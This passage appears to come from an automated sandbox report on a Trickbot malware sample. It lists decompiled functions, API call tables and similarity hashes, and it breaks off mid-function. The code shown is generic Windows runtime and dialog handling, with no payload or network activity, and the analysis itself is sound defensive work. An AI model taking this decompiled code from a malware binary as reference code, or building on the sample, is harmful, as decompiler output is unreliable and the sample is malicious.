SetActiveWindow.USER32(?), ref: 0041A4F7
SendMessageA.USER32(?,00000112,?,?), ref: 0041A50D
IsWindow.USER32(?), ref: 0041A51A
SetActiveWindow.USER32(?), ref: 0041A521
IsWindow.USER32(?), ref: 0041A526
SetFocus.USER32(?), ref: 0041A530

Strings

u, xrefs: 0041A53B

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 2818d96287be1a4e6744b06c25580ec2b11bdce5580c43ee3e89ac182c6ab261
Instruction ID: ae1f678ee06cd1afa2dde316f473f01efa023dce23f25be664f04c55ef8a1cbc
Opcode Fuzzy Hash: 2818d96287be1a4e6744b06c25580ec2b11bdce5580c43ee3e89ac182c6ab261
Instruction Fuzzy Hash: 6711D632506205BBDF316F79DE089EB7A66DF44710F04813BE901926A1D67CCDE0DA5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041CADB, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041CADB(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E0041C9C1(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

0x0041caec
0x0041caef
0x0041caf0
0x0041caf7
0x0041cafb
0x0041cb05
0x0041cb14
0x0041cb18
0x0041cb21
0x0041cb23
0x0041cb28
0x0041cb2c
0x0041cb2c
0x0041cb47
0x0041cb49
0x0041cb49
0x0041cb4f
0x0041cb54
0x0041cb56
0x0041cb56
0x0041cb69
0x0041cb69
0x0041caff
0x0041cb03
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 0041CAF7
GetStockObject.GDI32(0000000D), ref: 0041CAFF
GetObjectA.GDI32(00000000,0000003C,?), ref: 0041CB0C
GetDC.USER32(00000000), ref: 0041CB1B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041CB32
MulDiv.KERNEL32(?,00000048,00000000), ref: 0041CB3E
ReleaseDC.USER32(00000000,00000000), ref: 0041CB49

Strings

System, xrefs: 0041CAF0, 0041CB5F

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 3da9e1d72f07c621294702195d3c1c7fd9c413acf046fb248f006cac22c4412e
Instruction ID: 6e3725e3afaea2b5f42bfef380bc7a1900b360e8316c24ab246933eb3b64c65f
Opcode Fuzzy Hash: 3da9e1d72f07c621294702195d3c1c7fd9c413acf046fb248f006cac22c4412e
Instruction Fuzzy Hash: D0115A71A44218BBEB109B95DC49FEE7B78EB15741F004025F605E72C0D7B4AD41CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B897, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E0040B897(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x44ba40 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x44ba44; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x44ba48; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x44ba40(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x44ba40 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x44ba44 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x44ba48 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x0040b898
0x0040b89a
0x0040b8a2
0x0040b8e6
0x0040b8e6
0x0040b8ed
0x0040b8f1
0x0040b8f5
0x0040b8f7
0x0040b8fe
0x0040b903
0x0040b903
0x0040b8fe
0x0040b8f5
0x00000000
0x0040b912
0x0040b8af
0x0040b8b3
0x0040b91c
0x00000000
0x0040b91c
0x0040b8c1
0x0040b8c5
0x0040b8ca
0x00000000
0x0040b8cc
0x0040b8da
0x0040b8e1
0x00000000
0x0040b8e1

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 0040B8A9
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040B8C1
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040B8D2
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040B8DF

Strings

GetLastActivePopup, xrefs: 0040B8D4
MessageBoxA, xrefs: 0040B8BB
user32.dll, xrefs: 0040B8A4
GetActiveWindow, xrefs: 0040B8CC

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: d949d3465b574957603304a922c04e9659560606c5952c762aaf0f580d181137
Instruction ID: 3b4fae0b7554c2901090a9ffbb2c434fd57c457b19a738776c202a3d2233c071
Opcode Fuzzy Hash: d949d3465b574957603304a922c04e9659560606c5952c762aaf0f580d181137
Instruction Fuzzy Hash: 89018475700205AFC7209FB59CC5A2B3BE8EB9D740705043BF601E2AA1DB78C801ABED

Uniqueness

Uniqueness Score: -1.00%

Function 0040D42D, Relevance: 13.7, APIs: 9, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040D42D(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x43eb20);
				_push(E004070AC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x44bad8; // 0x0
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E0040995E(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E0040995E(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x44bad8; // 0x0
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x44b970; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00405B80(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00405B80(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x43e9dc, _t107, 0x43e9dc, _t107) == 0) {
						if(CompareStringA(0, 0, 0x43e9d8, _t107, 0x43e9d8, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x44bad8 = 2;
							goto L5;
						}
					} else {
						 *0x44bad8 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

0x0040d430
0x0040d432
0x0040d437
0x0040d442
0x0040d443
0x0040d44a
0x0040d450
0x0040d455
0x0040d45d
0x0040d45e
0x0040d4a0
0x0040d4a0
0x0040d4a5
0x0040d4ab
0x0040d4b1
0x0040d4b2
0x0040d4b4
0x0040d4b4
0x0040d4ba
0x0040d4c2
0x0040d4c8
0x0040d4c9
0x0040d4c9
0x0040d4cc
0x0040d4d4
0x0040d4f3
0x00000000
0x0040d4f9
0x0040d4fc
0x0040d4fe
0x0040d503
0x0040d503
0x0040d508
0x0040d516
0x0040d523
0x0040d52e
0x0040d571
0x0040d571
0x00000000
0x0040d530
0x0040d53f
0x00000000
0x0040d545
0x0040d547
0x0040d578
0x00000000
0x0040d57a
0x0040d57e
0x0040d580
0x0040d586
0x0040d588
0x0040d588
0x0040d58d
0x00000000
0x00000000
0x0040d592
0x0040d596
0x0040d5a1
0x0040d5a4
0x00000000
0x0040d5a6
0x00000000
0x0040d5a6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d596
0x0040d588
0x0040d586
0x00000000
0x0040d57e
0x0040d549
0x0040d54d
0x0040d54f
0x0040d555
0x0040d557
0x0040d557
0x0040d55c
0x00000000
0x00000000
0x0040d561
0x0040d565
0x0040d56c
0x0040d56f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040d565
0x0040d557
0x0040d555
0x00000000
0x00000000
0x0040d54d
0x0040d547
0x0040d53f
0x0040d525
0x0040d525
0x0040d525
0x0040d525
0x0040d518
0x0040d518
0x0040d518
0x0040d51a
0x0040d51a
0x0040d51a
0x0040d5ab
0x0040d5ab
0x0040d5b6
0x0040d5bc
0x0040d5c1
0x00000000
0x0040d5c7
0x0040d5c7
0x0040d5d1
0x0040d5d6
0x0040d5db
0x0040d5de
0x0040d5fd
0x00000000
0x0040d61d
0x0040d62c
0x0040d62e
0x0040d633
0x00000000
0x0040d635
0x0040d635
0x0040d640
0x0040d645
0x0040d648
0x0040d64a
0x0040d64d
0x0040d667
0x00000000
0x0040d680
0x0040d68e
0x0040d68e
0x0040d667
0x0040d633
0x0040d5fd
0x0040d5c1
0x0040d508
0x0040d4d6
0x0040d4e6
0x0040d4e6
0x0040d460
0x0040d473
0x0040d490
0x0040d696
0x0040d696
0x0040d496
0x0040d496
0x00000000
0x0040d496
0x0040d475
0x0040d475
0x00000000
0x0040d475
0x0040d473
0x0040d698
0x0040d69e
0x0040d6a9
0x00000000

APIs

CompareStringW.KERNEL32(00000000,00000000,0043E9DC,00000001,0043E9DC,00000001,00000000,01230E4C,?), ref: 0040D46B
CompareStringA.KERNEL32(00000000,00000000,0043E9D8,00000001,0043E9D8,00000001), ref: 0040D488
CompareStringA.KERNEL32(?,?,00000000,?,?,?,00000000,01230E4C,?), ref: 0040D4E6
GetCPInfo.KERNEL32(?,00000000,00000000,01230E4C,?), ref: 0040D537
MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000), ref: 0040D5B6
MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,?,?), ref: 0040D617
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0040D62A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0040D676
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040D68E

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 3057979ef30cf42b864163462c61933065c5e0aeb3ba1c590f46783760f614c3
Instruction ID: 4887ad1cf9c46c076eba65355ef0af9a9b4a3695540afda8ff8e194e80ccaebf
Opcode Fuzzy Hash: 3057979ef30cf42b864163462c61933065c5e0aeb3ba1c590f46783760f614c3
Instruction Fuzzy Hash: F2718971D00249BBCF219F949C41AEF7BB9EB09358F14043AF914B22A0D23A9C59DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040973A, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0040973A(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x43e9e0);
				_push(E004070AC);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x44b94c; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040995E(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x44b94c; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x44b970; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00405B80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00405B80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x43e9dc, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x43e9d8, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x44b94c = 2;
							goto L5;
						}
					} else {
						 *0x44b94c = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x0040973d
0x0040973f
0x00409744
0x0040974f
0x00409750
0x00409757
0x0040975d
0x00409762
0x00409768
0x004097b0
0x004097b3
0x004097bb
0x004097c1
0x004097c2
0x004097c2
0x004097c5
0x004097cd
0x004097ef
0x00000000
0x004097f5
0x004097f8
0x004097fa
0x004097ff
0x004097ff
0x0040980f
0x0040981f
0x00409821
0x00409826
0x00000000
0x0040982c
0x0040982c
0x00409837
0x0040983c
0x00409841
0x00409844
0x00409860
0x00000000
0x0040987b
0x0040988d
0x0040988f
0x00409894
0x00000000
0x00409896
0x0040989a
0x004098dc
0x004098eb
0x004098f0
0x004098f3
0x004098f5
0x004098f8
0x00409912
0x00000000
0x0040992c
0x0040992f
0x00409930
0x00409931
0x00409937
0x0040993a
0x00409933
0x00409933
0x00409934
0x00409934
0x0040994d
0x00409951
0x00000000
0x00000000
0x00000000
0x00000000
0x00409951
0x0040989c
0x0040989f
0x00409957
0x00409957
0x00000000
0x00000000
0x00000000
0x0040989f
0x0040989a
0x00409894
0x00409860
0x00409826
0x004097cf
0x004097e1
0x004097e1
0x0040976a
0x0040976a
0x0040976b
0x0040976e
0x00409784
0x004097a0
0x004098c8
0x004098c8
0x004097a6
0x004097a6
0x00000000
0x004097a6
0x00409786
0x00409786
0x00000000
0x00409786
0x00409784
0x004098d0
0x004098db

APIs

LCMapStringW.KERNEL32(00000000,00000100,0043E9DC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0040977C
LCMapStringA.KERNEL32(00000000,00000100,0043E9D8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409798
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 004097E1
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409819
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409871
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409887
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 004098BA
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409922

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 08f1af1a6257b852480a0b7e22cfb9c59dbb6420ff9ef480f6eb62d81f264e40
Instruction ID: 6ce60451d40e9022e1854fd40207490277e1f8a0feb6d6cda9ab32592d839c94
Opcode Fuzzy Hash: 08f1af1a6257b852480a0b7e22cfb9c59dbb6420ff9ef480f6eb62d81f264e40
Instruction Fuzzy Hash: 965149B2510209ABCF219F958C45AEB7FB4FB49750F10412AF910A22A1C33A9D50DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042C05A, Relevance: 13.6, APIs: 9, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0042C05A(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				int _v12;
				int _v20;
				void* __ebp;
				int _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				struct HWND__* _t42;
				int _t44;
				struct HWND__* _t64;
				struct _PROPSHEETHEADER* _t78;
				intOrPtr* _t81;
				int _t83;
				intOrPtr _t84;
				void* _t85;

				_t81 = __ecx;
				E0041B266(__ecx, 0x10);
				E0041B266(__ecx, 0x3c000);
				 *((intOrPtr*)( *__ecx + 0xbc))();
				_t37 =  *((intOrPtr*)(E00432562() + 4));
				_v12 = _t37;
				if(_t37 != 0) {
					E00428536(0);
				}
				_t38 =  *((intOrPtr*)(_t81 + 0x7c));
				_t89 = _t38;
				if(_t38 != 0) {
					_t39 =  *((intOrPtr*)(_t38 + 0x1c));
				} else {
					_t39 = 0;
				}
				_t64 = E004286DC(_t39,  &_v8);
				_t78 = E0042BD0C(_t81, _t89);
				_v20 = 0;
				 *(_t78 + 8) = _t64;
				if(_t64 != 0 && IsWindowEnabled(_t64) != 0) {
					EnableWindow(_t64, 0);
					_v12 = 1;
				}
				_t42 = GetCapture();
				if(_t42 != 0) {
					SendMessageA(_t42, 0x1f, 0, 0);
				}
				 *(_t81 + 0x24) =  *(_t81 + 0x24) | 0x00000010;
				 *((intOrPtr*)(_t81 + 0x2c)) = 0;
				E00418D00(0, _t81);
				 *(_t78 + 5) =  *(_t78 + 5) | 0x00000004;
				 *(_t81 + 0x24) =  *(_t81 + 0x24) | 0x00000010;
				_t44 = PropertySheetA(_t78);
				 *(_t78 + 5) =  *(_t78 + 5) & 0x000000fb;
				_t83 = _t44;
				E00418D4C();
				if(_t83 == 0 || _t83 == 0xffffffff) {
					 *(_t81 + 0x24) =  *(_t81 + 0x24) & 0xffffffef;
				}
				_t84 =  *((intOrPtr*)(_t81 + 0x2c));
				if( *((intOrPtr*)( *_t81 + 0x70))() != 0) {
					_t85 = 4;
					if((E0041B66F(_t81) & 0x00000001) != 0) {
						_t85 = 5;
					}
					_push(_t85);
					_t84 = E0041B024(_t81);
				}
				if( *((intOrPtr*)(_t81 + 0x1c)) != 0) {
					E0041B784(_t81, 0, 0, 0, 0, 0, 0x97);
				}
				if(_v12 != 0) {
					EnableWindow(_t64, 1);
				}
				if(_t64 != 0 && GetActiveWindow() ==  *((intOrPtr*)(_t81 + 0x1c))) {
					SetActiveWindow(_t64);
				}
				 *((intOrPtr*)( *_t81 + 0x58))();
				if(_v4 != 0) {
					E00428536(1);
				}
				if(_v8 != 0) {
					EnableWindow(_v8, 1);
				}
				return _t84;
			}

0x0042c05f
0x0042c063
0x0042c06d
0x0042c076
0x0042c081
0x0042c088
0x0042c08c
0x0042c091
0x0042c091
0x0042c096
0x0042c099
0x0042c09b
0x0042c0a1
0x0042c09d
0x0042c09d
0x0042c09d
0x0042c0b3
0x0042c0ba
0x0042c0be
0x0042c0c2
0x0042c0c5
0x0042c0d4
0x0042c0da
0x0042c0da
0x0042c0e2
0x0042c0ea
0x0042c0f1
0x0042c0f1
0x0042c0f7
0x0042c0fc
0x0042c0ff
0x0042c104
0x0042c108
0x0042c10d
0x0042c113
0x0042c117
0x0042c119
0x0042c122
0x0042c129
0x0042c129
0x0042c12f
0x0042c139
0x0042c13f
0x0042c148
0x0042c14c
0x0042c14c
0x0042c14d
0x0042c155
0x0042c155
0x0042c15a
0x0042c168
0x0042c168
0x0042c171
0x0042c176
0x0042c176
0x0042c17e
0x0042c18c
0x0042c18c
0x0042c196
0x0042c19f
0x0042c1a3
0x0042c1a3
0x0042c1ae
0x0042c1b6
0x0042c1b6
0x0042c1c3

APIs

IsWindowEnabled.USER32(00000000), ref: 0042C0C8
EnableWindow.USER32(00000000,00000000), ref: 0042C0D4
GetCapture.USER32 ref: 0042C0E2
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0042C0F1
PropertySheetA.COMCTL32(00000000,?,?,00000001,?,?,00000000), ref: 0042C10D
EnableWindow.USER32(00000000,00000001), ref: 0042C176
GetActiveWindow.USER32 ref: 0042C180
SetActiveWindow.USER32(00000000), ref: 0042C18C
EnableWindow.USER32(?,00000001), ref: 0042C1B6

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$Enable$Active$CaptureEnabledMessagePropertySendSheet
String ID:
API String ID: 61310451-0
Opcode ID: 8480f47b30342456b10db9addb93e20acd871bd336158a2009cd748364251c11
Instruction ID: 235a76fc60bddd43f69087eac986def6a218281fbe580fcc8418a429f5aa133d
Opcode Fuzzy Hash: 8480f47b30342456b10db9addb93e20acd871bd336158a2009cd748364251c11
Instruction Fuzzy Hash: 2841C430300710ABD721AF75E889A6FB7E5AF44701F94492EF24686292DBB99C848A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00411E60, Relevance: 13.6, APIs: 9, Instructions: 128
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411E60() {
				signed int _t35;
				struct HWND__* _t38;
				signed int _t40;
				signed char _t47;
				intOrPtr* _t50;
				long _t51;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				long _t58;
				int _t59;
				void* _t61;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;

				_t58 = GetCurrentThreadId();
